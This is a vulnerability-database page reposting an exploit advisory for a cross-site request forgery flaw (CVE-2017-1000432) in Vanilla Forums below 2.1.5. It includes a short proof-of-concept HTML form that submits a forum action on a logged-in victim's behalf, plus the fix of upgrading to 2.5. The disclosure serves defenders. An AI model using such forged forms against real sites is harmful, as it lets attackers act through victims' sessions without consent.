Lucene search
K

Vanilla Forums Cross Site Request Forgery

🗓️ 09 Jan 2018 00:00:00Reported by Anand MeyyappanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

CSRF vulnerabilities in Vanilla Forums below 2.1.5 allow registered users to delete topics and comments without admin access. Update to version 2.5 for the solution

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Vanilla < 2.1.5 - Cross-Site Request Forgery Vulnerability
8 Jan 201800:00
zdt
Circl
CVE-2017-1000432
8 Jan 201800:00
circl
CNVD
Vanilla Forums Cross-Site Request Forgery Vulnerability
3 Jan 201800:00
cnvd
CVE
CVE-2017-1000432
2 Jan 201823:00
cve
Cvelist
CVE-2017-1000432
2 Jan 201823:00
cvelist
Exploit DB
Vanilla &lt; 2.1.5 - Cross-Site Request Forgery
8 Jan 201800:00
exploitdb
EUVD
EUVD-2017-1564
7 Oct 202500:30
euvd
exploitpack
Vanilla 2.1.5 - Cross-Site Request Forgery
8 Jan 201800:00
exploitpack
NVD
CVE-2017-1000432
2 Jan 201823:29
nvd
Prion
Cross site request forgery (csrf)
2 Jan 201823:29
prion
Rows per page
`# Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432  
# Google Dork: NA  
# Date: 7/1/2018  
# Contact: https://twitter.com/anandm47  
# website: https://anandtechzone.blogspot.in <https://t.co/MJ8SoRaIMn>  
# Exploit Author: Anand Meyyappan  
# Vendor Homepage: https://open.vanillaforums.com <https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14>  
# Software Link: https://open.vanillaforums.com/addon/vanilla-core-2.1  
# Tested on: Windows, Linux  
# CVE : CVE-2017-1000432  
  
Description  
  
  
Any registered user can delete topics and comments in forum without having admin access.  
  
  
  
2.Proof Of Concept  
  
  
  
Save the below code in html format, Once victim is logged into account. Use the below code.  
  
<form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709">   
<input name=" DeliveryType" value="VIEW" class="input" type="hidden">   
<input name=" DeliveryMethod" value="JSON" class="input" type="hidden"> <li>  
<label><br></label><input value="Send" class="submit" type="submit"></li> </ul>   
</form>  
  
3. Solution:  
  
  
Update to version 2.5  
  
https://open.vanillaforums.com/get/vanilla-core-2.5  
  
  
  
#Reference  
  
https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14  
https://www.cvedetails.com/cve/CVE-2017-1000432/  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000432  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation